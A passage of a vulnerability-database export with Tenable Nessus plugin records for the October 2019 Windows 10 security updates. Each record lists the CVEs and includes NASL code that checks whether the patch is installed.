contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n \n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2019-1366)", "edition": 15, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-10-08T00:00:00", "title": "KB4517389: Windows 10 Version 1903 October 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1342", "CVE-2019-1336", "CVE-2019-1307", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1366", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1356", "CVE-2019-1322", "CVE-2019-1321", "CVE-2019-1371", "CVE-2019-1316", "CVE-2019-1238", "CVE-2019-1326", "CVE-2019-1337", "CVE-2019-1359", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1323", "CVE-2019-1335", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1308", "CVE-2019-1320", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317", "CVE-2019-0608", "CVE-2019-1357"], "modified": "2019-10-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_OCT_4517389.NASL", "href": "https://www.tenable.com/plugins/nessus/129716", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129716);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1307\",\n \"CVE-2019-1308\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1323\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1335\",\n \"CVE-2019-1336\",\n \"CVE-2019-1337\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1356\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1366\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4517389\");\n script_xref(name:\"MSFT\", value:\"MS19-4517389\");\n\n script_name(english:\"KB4517389: Windows 10 Version 1903 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4517389.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker\n could execute arbitrary code in the context of the\n current user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-1307, CVE-2019-1308, \n CVE-2019-1335)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - An information disclosure vulnerability exists when \n Microsoft Edge based on Edge HTML improperly handles \n objects in memory. An attacker who successfully exploited \n the vulnerability could obtain information to further \n compromise the user\u00e2\u0080\u0099s system. To exploit the vulnerability, \n in a web-based attack scenario, an attacker could host a \n website in an attempt to exploit the vulnerability. In \n addition, compromised websites and websites that accept \n or host user-provided content could contain specially \n crafted content that could exploit the vulnerability. \n (CVE-2019-1356)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n \n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2019-1366)\");\n # https://support.microsoft.com/en-us/help/4517389/windows-10-update-kb4517389\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13a5b27c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4517389.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4517389');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4517389])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-15T06:23:07", "description": "The remote Windows host is missing security update 4519338.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker\n could execute arbitrary code in the context of the\n current user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-1307, CVE-2019-1308, \n CVE-2019-1335)\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - An information disclosure vulnerability exists when \n Microsoft Edge based on Edge HTML improperly handles \n objects in memory. An attacker who successfully exploited \n the vulnerability could obtain information to further \n compromise the user\u00e2\u0080\u0099s system. To exploit the vulnerability, \n in a web-based attack scenario, an attacker could host a \n website in an attempt to exploit the vulnerability. In \n addition, compromised websites and websites that accept \n or host user-provided content could contain specially \n crafted content that could exploit the vulnerability. \n (CVE-2019-1356)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238, CVE-2019-1239)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2019-1366)", "edition": 16, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-10-08T00:00:00", "title": "KB4519338: Windows 10 Version 1809 and Windows Server 2019 October 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1342", "CVE-2019-1336", "CVE-2019-1307", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1366", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1356", "CVE-2019-1322", "CVE-2019-1321", "CVE-2019-1371", "CVE-2019-1316", "CVE-2019-1238", "CVE-2019-1326", "CVE-2019-1337", "CVE-2019-1359", "CVE-2019-1230", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1323", "CVE-2019-1335", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1308", "CVE-2019-1320", "CVE-2019-1239", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317", "CVE-2019-0608", "CVE-2019-1357"], "modified": "2019-10-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_OCT_4519338.NASL", "href": "https://www.tenable.com/plugins/nessus/129717", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129717);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1239\",\n \"CVE-2019-1307\",\n \"CVE-2019-1308\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1323\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1335\",\n \"CVE-2019-1336\",\n \"CVE-2019-1337\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1356\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1366\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4519338\");\n script_xref(name:\"MSFT\", value:\"MS19-4519338\");\n\n script_name(english:\"KB4519338: Windows 10 Version 1809 and Windows Server 2019 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4519338.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker\n could execute arbitrary code in the context of the\n current user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-1307, CVE-2019-1308, \n CVE-2019-1335)\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - An information disclosure vulnerability exists when \n Microsoft Edge based on Edge HTML improperly handles \n objects in memory. An attacker who successfully exploited \n the vulnerability could obtain information to further \n compromise the user\u00e2\u0080\u0099s system. To exploit the vulnerability, \n in a web-based attack scenario, an attacker could host a \n website in an attempt to exploit the vulnerability. In \n addition, compromised websites and websites that accept \n or host user-provided content could contain specially \n crafted content that could exploit the vulnerability. \n (CVE-2019-1356)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n 